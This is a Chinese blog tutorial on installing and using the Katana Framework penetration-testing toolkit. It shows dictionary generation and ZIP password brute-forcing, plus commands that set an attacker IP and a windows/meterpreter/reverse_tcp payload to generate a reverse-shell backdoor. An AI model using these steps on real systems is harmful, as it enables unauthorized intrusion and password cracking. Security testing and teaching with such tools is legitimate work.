Katana Framework武士刀操作指南
作者:admin | 时间:2018-5-8 22:43:37 | 分类:黑客工具 隐藏侧边栏展开侧边栏
Katana Framework是用Python语言写的渗透框架,但我更觉得它像是一个工具箱,作者是俄罗斯人,该工具集成以下功能:SQL注入、NMAP系统扫描探测、DNS欺骗,DNS伪装、MSF后门、字典生成、邮件炸弹、WHOIS、ARP投毒、对HTTP、SSH、RAR 、ZIP的暴力破解还有部分模块可以对ARP、无线接入点、LAN和WEB进行拒绝服务攻击。
PS:本文仅限于技术分享与讨论,严禁用于非法用途。
目前katana可以运行在以下的操作系统及分支。
系统分支 | 版本 | 支持 | 已经安装的依赖项目 | 状态 |
---|---|---|---|---|
Kali Linux | 4.4.0 | 是 | 是 | 可工作 |
Debian(8) | 4.4.0 | 是 | 是 | 可工作 |
Parrot OS | 是 | 是 | 可工作 | |
Wifislax | 是 | 是 | 可工作 | |
OpenSuse | 是 | 否 | 可工作 | |
Arch Linux | 4.8.6 | 是 | 否 | 可工作 |
Raspbian | 4.1.7 | 是 | 否 | 可工作 |
Ubuntu | 14.04 | 是 | 否 | 可工作 |
Xbuntu | 4.4.0 | 是 | 否 | 可工作 |
安装和使用
首先我们使用git命令把它克隆到我们本地,这里我是用的是Centos7 x64
git clone https://github.com/PowerScript/KatanaFramework.git
要正常使用该工具我们还需要安装,等待脚本完成安装后,我们在命令行输入ktf.console就可以让它跑起来了。
cd KatanaFramework
chmod +x install
python install
其实这个工具跟meta很多特性都很相似,比如每次启动都会有不同的字符画,还有就是设置模块的关键字也是相同的
输入help可以查看该框架的帮助信息,show modules可以显示所有可用模块
show modules
比如我们生成一个字典并用来暴力破解Zip压缩文件(当然我们只是做个测试,如果密码复杂的话破解还是得靠运气的)使用use关键字加载一个模块
use mcs/gn.words
show options
我们保持参数默认,Run之后在我的home目录生成了一个7m左右的纯数字字典,之后我们载入fle/bt.zip模块
现在可以看到已经跑出了密码文件,但是在实际的破解中需要有一个非常强大的字典 。
我们再使用msf后门模块,生成一个后门试试
这里我把系统换成了kali,因为这个模块需要调用msfvenom命令,而Centos上安装的msfvenom生成后门一直出错,所以只能用咱们都懂的系统了,我们看到payload选项和encoders有大量的参数可供调用,大家可以根据自己需求填写,
使用set关键字设置参数,这里我把ip设置成攻击机,
set host 192.168.1.132
set encoder avoid_underscore_tolower
再设置一下编码
set payload windows/meterpreter/reverse_tcp
设置成反向的shell
然后run生成后门文件,只不过msf的木马各大厂商都能识别了,没有好的免杀效果我就不在这里献丑了
由于它渗透能力比较弱,我还是觉得这更像个做测试工具包,我在这里就不11演示每个模块了,大家可以自己去探索。